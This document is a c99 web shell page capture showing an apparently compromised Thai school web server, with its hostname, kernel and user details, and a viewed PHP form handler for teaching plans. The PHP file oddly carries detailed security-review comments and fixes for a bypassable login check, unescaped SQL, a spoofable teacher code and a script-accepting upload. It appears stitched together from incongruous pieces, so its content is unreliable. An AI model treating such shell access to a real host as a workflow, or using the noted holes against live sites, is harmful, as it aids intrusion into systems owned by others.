!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)


Viewing file:     InsertPlan.php (6.98 KB)      -rw-r--r--
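<?php
    /**
     * InsertPlan.php -- receives the "add teaching plan" form, stores the plan and its
     * method / specification rows, then falls through to the confirmation page below.
     *
     * NOTE(review): this listing was recovered from a rendered view that dropped
     * punctuation (=, ., commas, parentheses). The restored operators follow the
     * obvious reading of each line but should be checked against the original file.
     *
     * Relies on names defined in the included files (not visible here): DBConn,
     * dmyE2ymdE2(), InsertPlan(), InsertMTP(), InsertSpt(), $_Config_absolute_path
     * and $PlanPicPath.
     */
    session_start();

    /** Set Timezone **/
    date_default_timezone_set('Asia/Bangkok');

    /**  Define Validate Access  */
    // NOTE(review): the constant's value is not visible in the recovered listing; 1 is assumed.
    define('_VALID_ACCESS', 1);

    /**  Check Session User Login  */
    // Both session entries must be present. The earlier "&&" form only rejected a
    // request when BOTH were missing, so a session carrying just one of them got in.
    if (!session_is_registered("valid_user") || !session_is_registered("Priority")) {
        echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    }

    /**  Configuration  */
    require_once( "../configuration.php" );
    require_once( $_Config_absolute_path . "/includes/framework.php" );
    require_once( "../include/Function.php" );
    require_once( "../include/FunctionDB.php" );

    /**  Create Database Object  */
    $dbObj = new DBConn;

    //=== SESSION
    $Username = $valid_user;

    /**  Config Table for This Page  */
    $myTable1 = "personal_tb";

    /**  Table  -->  personal_tb  */
    // NOTE(review): $Username is interpolated into the SQL text unescaped. It comes from
    // the session rather than the request, but it should still be escaped or bound with
    // whatever DBConn offers; the DBConn API is not visible from this file.
    $query1 = " SELECT *  FROM $myTable1  WHERE Username='$Username' ";
    $result1 = $dbObj->execQuery($query1);
    $rss = $dbObj->fetchArray($result1);

    // NOTE(review): Teacher_code is taken from the request and never compared with the
    // logged-in user's row ($rss), so one account can file a plan under another teacher's
    // code. Confirm the personal_tb column to compare against and enforce it here.
    $Teacher_code = $_POST['Teacher_code'];
    $Status = $_POST['Status'];
    $programId = $_POST['programId'];
    $courseId = $_POST['courseId'];
    //$conditionId1 = $_POST['conditionId1'];
    //$conditionId2 = $_POST['conditionId2'];

    $Method_code = $_POST['Method_code'];
    $Place = trim( $_POST['Place'] );
    $Course_code = $_POST['courseCode'];
    $courseName = $_POST['courseName'];
    $courseUnit = $_POST['courseUnit'];
    $Total_std = $_POST['Total_std'];
    $Total_hour = $_POST['Total_hour'];

    // Start date (day/month/year) arrives in mDate and is converted by dmyE2ymdE2().
    // The earlier read of $_POST['Start_date'] was overwritten immediately and is dropped.
    $Start_date = dmyE2ymdE2($_REQUEST["mDate"]);

    $Mainidea = htmlspecialchars( trim( $_POST['Mainidea'] ) );      // main concept
    $Objective = htmlspecialchars( trim( $_POST['Objective'] ) );    // topic taught
    $Title_name = htmlspecialchars( trim( $_POST['Title_name'] ) );  // topic taught

    /*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
    $Media = htmlspecialchars( trim( $_POST['Media'] ) );        // original author's note: where is this field?
    $Appendix = htmlspecialchars( trim( $_POST['Appendix'] ) );  // original author's note: where is this field?
    /*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/

    $Res_unit = $_POST['Res_unit'];  // classroom research
    $Apply = $_POST['Apply'];        // research results applied in other research

    //---  Teaching methods: $M1 .. $M21
    // The variable names are built from fixed prefixes and counters, never from request
    // data. A field the browser did not send becomes null, which is what the direct
    // $_POST read produced, minus the undefined-index notice.
    for ($i = 1; $i <= 21; $i++) {
        ${'M' . $i} = isset($_POST['M' . $i]) ? $_POST['M' . $i] : null;
    }
    $M_else = isset($_POST['M_else']) ? $_POST['M_else'] : null;
    $Else_desc = isset($_POST['Else_desc']) ? $_POST['Else_desc'] : null;

    //---  Teaching plan characteristics: $Sp1 .. $Sp10
    for ($i = 1; $i <= 10; $i++) {
        ${'Sp' . $i} = isset($_POST['Sp' . $i]) ? $_POST['Sp' . $i] : null;
    }

    //---  Measurement and evaluation methods: $Asses1 .. $Asses4
    for ($i = 1; $i <= 4; $i++) {
        ${'Asses' . $i} = isset($_POST['Asses' . $i]) ? $_POST['Asses' . $i] : null;
    }

    ///----------///
    $Path = "../Plan_pic";

    //---  Table  -->  'research_tb'
    //###  Upload Image File
    // The stored name used to keep whatever extension the client sent and was written with
    // @copy(), so a script file could be placed under $PlanPicPath and failures went
    // unnoticed. Now the upload must be a genuine, error-free HTTP upload whose extension
    // is on an allowlist, and a file name is recorded only when the move succeeded.
    // NOTE(review): confirm the allowlist against what teachers actually attach, and make
    // sure the web server does not execute scripts from the upload directory.
    $Filetex = "";  // explicit default, so the value can never come from the request
    if (isset($_FILES['Filetex']) && $_FILES['Filetex']['name'] != "") {
        $allowedExt = array('jpg', 'jpeg', 'png', 'gif', 'pdf', 'doc', 'docx');
        $ext = strtolower(substr(strrchr($_FILES['Filetex']['name'], "."), 1));

        if ($_FILES['Filetex']['error'] == UPLOAD_ERR_OK
            && is_uploaded_file($_FILES['Filetex']['tmp_name'])
            && in_array($ext, $allowedExt, true)) {
            $storedName = date('YmdHis') . "." . $ext;
            // move_uploaded_file() re-checks the upload origin and removes the temp file itself.
            if (move_uploaded_file($_FILES['Filetex']['tmp_name'], $PlanPicPath . $storedName)) {
                $Filetex = $storedName;
            }
        }
    }

    //---  Insert to DB
    //---  Table  -->  'tech_plan_tb'
    // NOTE(review): $acadYear, $semester, $courseCode, $conditionId1, $conditionId2 and
    // $Assess_code are not assigned in this file ($Course_code is assigned, $courseCode is
    // passed). Unless the included files set them, they are empty or, with
    // register_globals on, supplied by the request. Assign them explicitly.
    // NOTE(review): most values below are raw request data; whether InsertPlan(),
    // InsertMTP() and InsertSpt() escape them is not visible from here.
    InsertPlan( $Teacher_code, $acadYear, $semester, $programId, $courseCode, $Status, $conditionId1, $conditionId2, $courseId, $Start_date, $Objective, $Mainidea, $Title_name, $Total_hour, $Total_std, $Assess_code, $Method_code, $Place, $Media, $Appendix, $Res_unit, $Apply, $Asses1, $Asses2, $Asses3, $Asses4, $Filetex );

    // Id of the tech_plan_tb row just inserted; it links the two child tables below.
    $Plan_code = mysql_insert_id();

    //---  Table  -->  'techplan_method_tb'
    InsertMTP( $Plan_code, $Teacher_code, $courseId, $M1, $M2, $M3, $M4, $M5, $M6, $M7, $M8, $M9, $M10, $M11, $M12, $M13, $M14, $M15, $M16, $M17, $M18, $M19, $M20, $M21, $M_else, $Else_desc );

    //---  Table  -->  'tech_spec_tb'
    InsertSpt( $Plan_code, $Teacher_code, $courseId, $Sp1, $Sp2, $Sp3, $Sp4, $Sp5, $Sp6, $Sp7, $Sp8, $Sp9, $Sp10 );
?>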
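<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<title>ข้อมูลทั่วไปบุคลากร - ข้อมูลแผนการสอน - เพิ่มข้อมูลแผนการสอน</title>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    // Confirmation page shown after the plan has been stored.
    // $Teacher_code is request data and is written into two URLs below. urlencode() leaves
    // only characters that are safe in a query string and inside a quoted HTML attribute,
    // so a crafted value cannot break out of the href or the refresh target. Anything that
    // is not a plain string (for example an array parameter) becomes an empty value.
    $teacherCodeParam = is_string($Teacher_code) ? urlencode($Teacher_code) : '';

    include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset>
     <table width="780" border="0" cellspacing="0" cellpadding="0">
      <form id="myForm" name="myForm" method="post" action="">
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td style="padding-left:15px;"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="Menu_Teach.php">ข้อมูลทั่วไปบุคลากร</a> &raquo; <a href="PlanList.php?Teacher_code=<?php echo $teacherCodeParam; ?>">ข้อมูลแผนการสอน</a> &raquo; <span class="NOTE">เพิ่มข้อมูลแผนการสอน</span></strong></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="150" align="center"><span class="TEXT-GREEN10"><strong>ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว</strong></span><br />
          กรุณารอส้กครู่ กำลังเปลี่ยนหน้าอัตโนมัติ<br />
          <?php /* automatic redirect back to the plan list after one second */ echo "<meta http-equiv=\"refresh\" content=\"1; URL=PlanList.php?Teacher_code=" . $teacherCodeParam . "\">"?></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr></form>
    </table>
   </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>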
<?php
    
/**
 * Free Resource: hand the personal_tb result set ($result1, produced by
 * $dbObj->execQuery() earlier in this script) back to the DB wrapper.
 * The not-logged-in path calls exit() before reaching this point, so both
 * $dbObj and $result1 exist whenever these lines run.
 */
    
$dbObj->freeresult($result1);
    
    
/**  Close the Database: presumably closes the connection held by DBConn (class not visible in this file)  */
    
$dbObj->disconn();
    
    
/**  Unset Class: drop the wrapper object only after the result set is freed and the connection closed  */
    
unset($dbObj);
?>


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0084 ]--